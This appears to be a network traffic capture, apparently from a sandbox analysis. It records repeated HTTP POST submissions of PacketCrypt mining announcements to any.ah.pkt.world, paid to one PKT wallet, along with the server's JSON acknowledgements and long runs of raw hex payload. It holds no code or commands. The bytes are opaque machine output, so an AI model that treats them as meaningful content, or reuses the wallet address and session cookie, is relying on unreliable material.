Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:00:06.313733101 CET	277	OUT	POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2836974 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 12:00:06.314022064 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 0b 01 00 38 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4008`XCI+x_< \|'0ucTpn\|zS,qL0SPMy94zd*WOdK0X-:
Jan 7, 2025 12:00:06.318610907 CET	1236	OUT	Data Raw: d0 fe df 6a 86 7f 19 4e c7 53 25 a7 8e f8 e4 dd 75 83 d3 06 2b 11 d9 cf 2e 7c 08 ea 85 8f d9 ac 0e 8d d4 47 f1 7e 19 fc bc 4e 05 f6 f2 77 6c 1a 1c 37 18 19 75 8d fe 0b 7a 95 a4 96 93 bb 2e ea 9f 77 b7 4c b9 fa 73 c3 30 04 65 86 8c a2 f1 de e9 20 Data Ascii: jNS%u+.\|G~Nwl7uz.wLs0e )$8UC3FMGJs:=TS:BADnq&qgl;#^vY&LKQ{G&]_^n86-`U$s40088`XCI+
Jan 7, 2025 12:00:06.318964958 CET	4944	OUT	Data Raw: 38 e9 fa 7d 20 d5 be f8 ae 74 0d 0a 34 30 30 0d 0a 01 99 39 00 38 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 8} t40098`XCI+4'UDTtRgSHx&>5f4qyAU2pz\|e>O:5b,r,Y7KK9uB_7r6q
Jan 7, 2025 12:00:06.318983078 CET	2472	OUT	Data Raw: 33 c3 58 bf 19 b9 4b ec 1e 21 1d e1 89 4f ec cf 38 15 69 9f af 27 bc 8c d9 af c7 f8 b1 69 4c e4 bf b5 9f c9 ed fb 9e 78 8b ba 8e 9b 3a 70 cd 49 b9 e4 a5 6b b2 c2 1d 66 77 48 b2 be fe 5d e7 ca 9d 6c 1e 2e 72 40 ec c1 28 bc c0 bd 5b 11 84 90 db e6 Data Ascii: 3XK!O8i'iLx:pIkfwH]l.r@([LVQd4[abizDlGJs:=TS:BADnq&qgl;#^vY&Lf=UE[yh6/;N400;J8`XCI+
Jan 7, 2025 12:00:06.319025040 CET	7416	OUT	Data Raw: 6e 5c fe 90 79 5e dd 46 ca 27 dc bc cb ce e3 9a fd cd ee 00 36 f8 da 61 34 23 a2 1c b6 de 14 f6 56 68 2c 43 40 14 27 d4 56 83 9b 28 5e 23 09 d7 d1 fb 0a 4f 22 3c 34 e2 64 8f 7a 16 36 59 a4 15 bb a5 d3 17 76 5d 3d 39 47 51 b4 58 3a 41 70 18 0b 85 Data Ascii: n\y^F'6a4#Vh,C@'V(^#O"<4dz6Yv]=9GQX:ApW~&B ySmq>)4z+z/fpqq,>!2O3sC{A7+9i8-M,m_BqkSMd)<~=X]g0
Jan 7, 2025 12:00:06.323365927 CET	7416	OUT	Data Raw: 3e 7b 31 75 b3 a9 c3 92 89 78 75 2b 0d 4e 23 97 ae f8 08 67 64 b1 be 87 42 4b 9e 4d f1 ce a2 07 52 60 69 89 07 eb 97 c9 68 04 9d b0 94 80 a1 59 6c 14 ec f0 a4 76 c3 6a 03 60 8a 41 1e 31 cf ba 83 d7 1d b8 2e 59 31 40 e1 21 d6 8a 8c d7 11 e5 45 f1 Data Ascii: >{1uxu+N#gdBKMR`ihYlvj`A1.Y1@!Ea`Eyp$ '/e}BM1iP}"LTMJ7@\|za{uHfiL5d-ibNY*tdczSK]gX-`sf].$P
Jan 7, 2025 12:00:06.323467970 CET	2472	OUT	Data Raw: f0 e4 d4 c0 f9 91 f1 fd b0 ab 9f 45 d8 09 e3 ad 1d fa e1 06 e9 d4 c8 a9 5c 02 65 3e 4a 08 cc 66 d0 45 95 29 66 dc dd 13 27 94 1c 3b ff e6 e5 08 86 28 c4 1f ea 54 a8 78 04 3f 01 77 2d 25 3a 8c ed f6 43 37 21 74 75 52 29 29 9e 43 dd 3e c5 37 62 4f Data Ascii: E\e>JfE)f';(Tx?w-%:C7!tuR))C>7bO_~Lcr>nB9f;cp)?r\|HOO%ZVR8IHb\|_F'[Y "#>PZ,)HX%-_~\j+{/Y]YvA!\|j
Jan 7, 2025 12:00:06.323899031 CET	2472	OUT	Data Raw: 86 8a 14 72 35 99 45 a0 5d 55 a9 5a 84 d3 1f fb 50 f4 10 9f 39 d7 c8 35 e5 4e 81 f2 d7 38 0d 26 49 36 0d 0a 34 30 30 0d 0a 01 a6 80 00 37 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: r5E]UZP95N8&I64007`XCI+)x%*am\|r47C\|JnHh/O%mc8p3jtNX8k-O+X$v6vo%W1ej
Jan 7, 2025 12:00:06.323915958 CET	2472	OUT	Data Raw: 84 b2 52 5d 11 86 09 68 78 ab 01 f4 7a c3 4c 50 18 d4 0c f9 fc 5d 63 4d 1c f7 89 a5 86 a6 3f 49 a4 64 d2 48 ae 15 c1 90 2f fe 41 73 4a 78 94 97 d7 13 34 23 d6 a2 29 b3 db e3 01 20 3f 1f 6d 9f 42 90 d1 85 41 13 2a 54 1b db 35 dd 2b 0f 9a c0 74 8a Data Ascii: R]hxzLP]cM?IdH/AsJx4#) ?mBAT5+tnyAm)1] ?eG3=)rGq}Z!N]g"6Va?o==60 #0.Pa"Qn?bh$\(85WxFFNk$V*
Jan 7, 2025 12:00:06.323983908 CET	2472	OUT	Data Raw: 3f 04 a9 62 a3 43 8f 75 0f 96 e3 b6 e0 52 4a 43 ab 37 dc 7b dc 4b 8b 23 b5 9d e8 1d 4e de 3d d1 2c 28 f9 b6 e4 96 e2 78 78 54 15 39 4c 76 ed dc 81 8a 66 15 66 94 b1 57 41 6b 3b 2d 18 51 43 c2 7b eb 31 97 89 39 74 c7 77 31 da f7 8e ad 4c b5 77 01 Data Ascii: ?bCuRJC7{K#N=,(xxT9LvffWAk;-QC{19tw1Lw5~.2kbz`Gx^_?mA.FNW=8WoRc&(_\|#)l$tZ'nc\|(Po_^H6A'rO^eXIl@K8$&+a3xH?
Jan 7, 2025 12:00:07.616775036 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 07 Jan 2025 11:00:07 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 34 35 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 34 35 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 34 37 36 30 37 34 39 30 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 36 39 37 33 2d 38 31 37 42 36 35 42 35 33 39 33 33 31 34 34 41 44 41 33 32 45 36 46 39 34 35 34 39 31 39 45 45 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":545,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":545,"totalLen":0,"target":521618356,"time":1736247607490,"eventId":"cah-2836973-817B65B53933144ADA32E6F9454919EE"}}
Jan 7, 2025 12:00:07.832262039 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 07 Jan 2025 11:00:07 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 34 35 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 34 35 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 34 37 36 30 37 34 39 30 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 36 39 37 33 2d 38 31 37 42 36 35 42 35 33 39 33 33 31 34 34 41 44 41 33 32 45 36 46 39 34 35 34 39 31 39 45 45 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":545,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":545,"totalLen":0,"target":521618356,"time":1736247607490,"eventId":"cah-2836973-817B65B53933144ADA32E6F9454919EE"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:00:16.997328043 CET	277	OUT	POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2836974 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 12:00:16.997385025 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 eb 6c 05 38 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400l8`XCI+"O!j4Ty[jR;@\|yS=zRz1s(U:#63.J`c&9O!_cu>(NNc:gfgk\1mH,l!UUsi%].+
Jan 7, 2025 12:00:17.002816916 CET	3708	OUT	Data Raw: ce 82 5e 1c d0 44 7a 47 e8 ba bb fb ea 65 87 13 20 42 d7 75 25 c5 32 ed 96 fe 48 26 ff dc 63 95 ca 6b 30 e1 54 e3 7c 7b c2 61 46 24 2c 65 84 81 3b b4 20 49 c6 be 11 62 2c cd af 6e 7e f3 4d ea 36 e6 66 74 11 0f 86 e9 83 8c 71 4d b3 54 0d 33 26 6b Data Ascii: ^DzGe Bu%2H&ck0T\|{aF$,e; Ib,n~M6ftqMT3&kQ`[IbrR&;sCW=8WoRc&(_\|#)l$tZ'nc\|(Po_^H6A'rO=DmG%Fa&5.\|<gO{QA/M400'7`XCI+
Jan 7, 2025 12:00:17.002857924 CET	7416	OUT	Data Raw: 94 91 8c 57 59 97 ea ac 46 8d 4a 77 06 87 25 40 9c c6 cd b0 9b 98 df 16 25 4d d7 1d b0 aa 78 f0 82 d4 8f 21 b6 3e dd 4e dc 56 aa 6c db db c3 50 46 39 fe 22 67 5c 77 3c ee 89 f7 1f 46 a2 3b 20 db 21 cb b3 5d 05 80 fc 83 55 c8 b1 cd bc 34 d7 ab d1 Data Ascii: WYFJw%@%Mx!>NVlPF9"g\w<F; !]U4=vOmUq"OumU!I8~4R-TaQT+2Xey+'`5Wa\|[)"_CNEajq9>~aRq~'{_Q"u5~Q=a
Jan 7, 2025 12:00:17.002857924 CET	2472	OUT	Data Raw: a1 a1 b5 dc 12 13 a3 75 3d 34 c5 62 b6 17 4c 3f 6f e8 d7 83 55 92 89 75 02 86 25 48 e8 f7 49 fc 9d b4 eb 71 61 9a db 46 aa 6b ea ea 05 cc 9a d2 cb 41 94 66 dd d1 b6 aa b1 05 56 f2 14 6a 3e 04 25 0b 74 33 60 55 b5 94 3b cf bf 12 fc 1a d4 e4 65 20 Data Ascii: u=4bL?oUu%HIqaFkAfVj>%t3`U;e _Lfq"i2:\|?3\I90,R;ZcNu^B30qH+<<nbl Ffs2,5-Asts$@RU7Xdy/e}y=s588]Qv
Jan 7, 2025 12:00:17.002955914 CET	4944	OUT	Data Raw: 58 0a a1 85 b0 61 de 00 68 b4 d9 c9 6d 67 41 24 0c 0f d7 bd 5e 03 0d 0a 34 30 30 0d 0a 01 bb 07 06 37 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: XahmgA$^4007`XCI+Q_@2-DQw{@JD4iZqY$L{Og+y3a;QLCdLac%'\|kbLNo d/ma3
Jan 7, 2025 12:00:17.003097057 CET	2472	OUT	Data Raw: 81 d8 a4 25 94 81 d5 ed 7f 57 05 a9 8d 57 55 fd 8e 73 54 19 7a 8c 0b 43 cf 36 04 de 02 97 39 f6 93 61 8b 62 5b 95 bb 13 97 cd 53 13 21 29 08 ed f8 97 97 ab a5 d1 c6 ba b3 fd a4 2e 80 81 76 a1 2d 14 05 9f 68 c0 d9 0a 8e 89 62 07 be b7 23 1d 29 95 Data Ascii: %WWUsTzC69ab[S!).v-hb#)LIkL}J`HtYw`d_:,CcEoF/G,`T>Aq>$/>+eFo89gRnm7\|ci_W")E(tO400q
Jan 7, 2025 12:00:17.003112078 CET	2472	OUT	Data Raw: ef 64 28 4f e2 27 f0 bd 64 09 b9 d5 fd 03 08 1f 66 2c 1d c8 81 c0 cd 12 52 fc ae 7d bb 92 47 76 05 97 b4 35 45 73 a4 b4 2f 42 df e3 1a ca 83 a9 6e b5 cc 69 6b d5 f0 6f 41 01 88 58 0e 39 df 7b 37 66 fa de 0a f0 99 eb c2 96 53 cf 1f 99 8b 9e d0 ca Data Ascii: d(O'df,R}Gv5Es/BnikoAX9{7fS;jm_nOZE.=.Z{\|fMI8^O\|N6/Zb0{rU8YiNnRipB1zcN{4wmCN,>LaY87ve(g'SFKT#
Jan 7, 2025 12:00:17.007781982 CET	4944	OUT	Data Raw: 9d 08 a3 12 8f fd ee 9e b2 14 0a a8 f9 db 3e 99 20 8e 83 67 6b 1a 49 16 28 f7 8e ab e2 86 1c 7c 7a 24 9f f9 9a 61 85 7a 48 6f fa 6c ea bf 3b 40 4b 1f cf 13 a3 43 59 98 e7 c9 d9 f4 63 23 45 7b f7 ba f1 71 e3 ea 92 87 f7 b2 a4 5b 95 9c 06 91 7a 72 Data Ascii: > gkI(\|z$azHol;@KCYc#E{q[zr>/O;2X~eR$Z?w'oh\|p3+LN#XVY^YR(\G!My.?^ZG>6v=a+=R;wxtPzW$8%hUPi"^{CG
Jan 7, 2025 12:00:17.007802010 CET	2472	OUT	Data Raw: e6 32 b4 79 23 4a a1 c2 18 ff 1b 29 a5 11 7f 73 ec b3 fe fa ef ba ec 32 ff bb fd 4b 99 d9 40 b4 e4 2f 93 61 35 f0 ce 8e 1d 5d b8 23 ff 12 89 01 c2 2a bb 5c 57 77 c8 f9 ea 60 6f 3b 92 82 4e 94 18 58 35 26 98 0f ef 82 1c c3 5a c9 d7 85 a9 6a 0d 06 Data Ascii: 2y#J)s2K@/a5]#\Ww`o;NX5&Zjk1Gly.P'}`Q1T,O%Bvp'Jw>$JPPW(dP&16Rj#,C*!01a'!3h%E\|GY+[,Z
Jan 7, 2025 12:00:17.007817984 CET	2472	OUT	Data Raw: da bb 37 2a fa 58 85 05 ab ef 25 66 6a dd b2 1c c4 53 2f 3f cb a4 e4 fa f1 62 16 59 ca a3 91 0b 95 1f a3 3a 10 8c 92 d7 50 b4 f4 d5 6b 67 d5 d3 9c bb cb cd 67 a0 ca f6 fd 80 5e c0 de 37 24 8b 56 e9 a7 cf 89 9f 79 de c5 dc d0 04 2c 67 82 57 9b 06 Data Ascii: 7*X%fjS/?bY:Pkgg^7$Vy,gWsd_ ;!.w6yR7 2[gw{3t~:Xs=/b)t}v;EDVJpKs?0Shp1Yv5$`Llyn9:g_4>aFj3zo
Jan 7, 2025 12:00:18.981548071 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 07 Jan 2025 11:00:18 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 36 35 33 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 36 35 33 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 34 37 36 31 38 38 34 35 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 36 39 37 33 2d 43 39 37 35 33 35 43 38 35 33 32 38 43 45 33 38 44 37 39 34 42 37 30 30 35 41 31 46 35 38 36 45 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":653,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":653,"totalLen":0,"target":521618356,"time":1736247618845,"eventId":"cah-2836973-C97535C85328CE38D794B7005A1F586E"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:00:26.440233946 CET	277	OUT	POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2836974 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 12:00:26.440349102 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 e8 52 0c 36 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400R6`XCI+4Q@}<G<mrq#d5k\a>jiCC?D.zMzmnqCR2{jr@iUBW)-h0ZaCDC3UN
Jan 7, 2025 12:00:26.445034027 CET	1236	OUT	Data Raw: d5 2b 9b f4 5d 73 cf d3 ad 0c 99 12 1c 03 04 c9 ec c4 72 43 17 94 20 5e 3d d0 a2 de 69 ce 88 fa bd c8 5b 1f be f8 d2 ac de 44 6a ca 12 db 91 9b df cc 5b 9c 54 bc b8 6c 08 f6 66 c4 ce 87 08 3f d6 3f dd 4f 92 c8 f4 15 9f c3 44 0d 22 d6 e1 19 ae 8e Data Ascii: +]srC ^=i[Dj[Tlf??OD"B9_"`PTGJs:=TS:BADnq&qgl;#^vY&LY%V*wN]^t@XU^s8B!4005`XCI+
Jan 7, 2025 12:00:26.445261002 CET	4944	OUT	Data Raw: de e2 30 1e a5 5a 7c f4 90 4f 0d 0a 34 30 30 0d 0a 01 3c 6d 0b 38 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 0Z\|O400<m8`XCI+~vxFP=R 0]E}YT\]bV&JVr#:8\|IgO14j~Mb&>-i0M_{8OzK
Jan 7, 2025 12:00:26.445288897 CET	7416	OUT	Data Raw: 91 8a 90 3a 79 e1 38 a9 71 2b 53 2d 5f de 12 4d 98 74 d6 7e aa d8 2d 3d 40 2e 77 d1 ed d6 82 06 0b b0 de 47 19 d1 8d 4f 52 ab 9d 45 5a 6c 42 0b 07 fe fe 46 cc c2 12 45 48 77 5f 07 17 c5 d8 d2 a1 68 4b 23 2a cc f3 9d 10 1e fb 32 1d 48 8c 0b 24 72 Data Ascii: :y8q+S-_Mt~-=@.wGOREZlBFEHw_hK#*2H$r2Rv_f+N0#zCcEoF/G,`T>Aq>$/>+eFo89g!Z)]\1#`g`-j>kpjb400y6`XCI+
Jan 7, 2025 12:00:26.445424080 CET	7416	OUT	Data Raw: 40 18 16 9c ee 6e 52 35 e3 ae 5e 74 8a 42 e2 1d b1 3e 6e 2f 28 71 0d 0a 34 30 30 0d 0a 01 b1 85 0c 36 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @nR5^tB>n/(q4006`XCI+g=7\Fz7+8YmQxljqtVz$(mJ?4bq{q]WWuA!T+k[i*TH U
Jan 7, 2025 12:00:26.449752092 CET	2472	OUT	Data Raw: b8 b6 c3 ea 51 49 78 01 a6 e7 f5 a8 55 d6 7a f6 34 47 da 71 50 28 94 c7 c6 a4 2f ef 89 71 f3 b9 cf a7 b7 e4 3f da 77 4f 70 86 ca ca fe 72 e3 48 27 7e 78 0f b0 73 c8 47 10 c7 b9 a1 6a 3a 19 ea d6 d6 f2 2a ed 90 c8 ad 49 58 a3 46 a0 5f 12 55 80 b2 Data Ascii: QIxUz4GqP(/q?wOprH'~xsGj:*IXF_UTnrg-938:g$as.J~'M#((wB'`hM:z?w6C!ej4jr`EL&zDQ5y5h
Jan 7, 2025 12:00:26.449919939 CET	2472	OUT	Data Raw: c0 84 64 6a 07 7f 35 2c a7 1d 5f 3b a7 fe 78 35 ca fb f7 ac da 4e 40 91 5b 6b 84 e3 cb 16 31 cb 39 20 99 ad 67 6f 9c d6 79 99 a4 02 2c 1d c3 18 23 1f 22 40 19 5c b7 b6 5e a0 c8 54 48 f6 f5 8e 0c 28 66 30 7a 01 01 55 b1 29 63 35 96 62 3c 1c 28 8e Data Ascii: dj5,_;x5N@[k19 goy,#"@\^TH(f0zU)c5b<(:iuq"`\|'*4Z~11?m.<]F^k.4 hO>rjeW3-t<p_ 4)dvNA\vuu7os!nOm'}>A
Jan 7, 2025 12:00:26.450205088 CET	4944	OUT	Data Raw: 12 aa c1 f5 71 d3 1d 04 1d 91 10 20 fd 68 fc 09 27 3e 20 f6 3e d3 96 22 22 78 5e 15 a0 0f 64 68 a8 b7 0d 0a 34 30 30 0d 0a 01 72 af 0b 38 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: q h'> >""x^dh400r8`XCI+`YVzqt9n#IwPxuSD^yIL@o&~TxzDu>V0"C#z4B8Z1% fO[
Jan 7, 2025 12:00:26.450248957 CET	2472	OUT	Data Raw: ec 59 c3 ca a8 0e 96 65 d4 b4 17 8a 9a a5 d1 45 a6 e1 9e df 3f 99 6d fe 30 4c 15 55 a4 6c 0a 99 09 f1 e1 6d 71 d3 90 1d 66 c4 d6 3f 3e bf 6d 67 0e 77 62 20 3e 50 8b f3 72 1c d8 31 5e 37 c2 c1 cf 11 06 e0 ba 1f f3 3a 14 1a fe 98 de e2 77 d5 2a 5c Data Ascii: YeE?m0LUlmqf?>mgwb >Pr1^7:w*\Pn@nW`$k$v[E90SXIGydnN)3 ta2An`GJs:=TS:BADnq&qgl;#^vY&LzB(Z"VbCo0]E)h/p(G
Jan 7, 2025 12:00:26.450277090 CET	2472	OUT	Data Raw: 4b eb ef 59 b6 c0 71 25 fc 8b a1 d8 14 89 79 cd 3f b0 f0 7b 22 5d d2 47 57 5d ce f2 ba a2 19 dc 11 ae a2 69 5c 08 2d 1f 63 a0 58 4e 02 1c 0e e2 f6 21 b2 92 6c 38 7d 8c 02 7b 80 15 74 26 f0 89 20 d7 44 43 03 c6 27 ac f7 f8 ad 75 f4 c1 44 81 19 17 Data Ascii: KYq%y?{"]GW]i\-cXN!l8}{t& DC'uDEi}_,#)CbP&5}{8KvT5P#(Pz3WCG,h-UJoj2y:s"\|VAS-}:1zDx/vAcBa8!dD*Q-{UiPkMqmFJU
Jan 7, 2025 12:00:27.737229109 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 07 Jan 2025 11:00:27 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 32 31 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 32 31 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 34 37 36 32 37 36 31 32 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 36 39 37 33 2d 31 31 34 42 30 31 39 38 38 45 30 34 35 39 41 42 34 32 46 30 32 37 32 46 30 45 45 44 34 34 38 35 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":521,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":521,"totalLen":0,"target":521618356,"time":1736247627612,"eventId":"cah-2836973-114B01988E0459AB42F0272F0EED4485"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:00:36.528321981 CET	277	OUT	POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2836974 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 12:00:36.528321981 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 51 bf 01 3a ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400Q:`XCI+E;-[&+-DDc[y4E]*7K`tVy9$BI\7?Mo4Z'liU+g`2f^cT3"QBP<}A`u1Y^"Af~
Jan 7, 2025 12:00:36.533312082 CET	1236	OUT	Data Raw: f4 c0 7e 88 99 72 03 e8 f7 fe 04 c5 4a a7 0e d7 8f 15 92 c3 28 23 7f 9a 44 d9 61 b8 c0 14 d4 18 99 30 2d be 9e 44 f2 f8 3b 23 64 6b d7 ff ee fc d5 6f 16 2b f6 53 a7 56 d4 49 1e e3 5f be dd df 32 a1 a5 74 28 e4 4d 69 bd 01 d6 5b 99 4f 72 a2 9f 76 Data Ascii: ~rJ(#Da0-D;#dko+SVI_2t(Mi[Orv}XBZviR1%=r}P3Zj<Pc2"E("OJ~zM[+hjm: <LbO!Q0i^!O0B- 4&u@400u;`XCI+
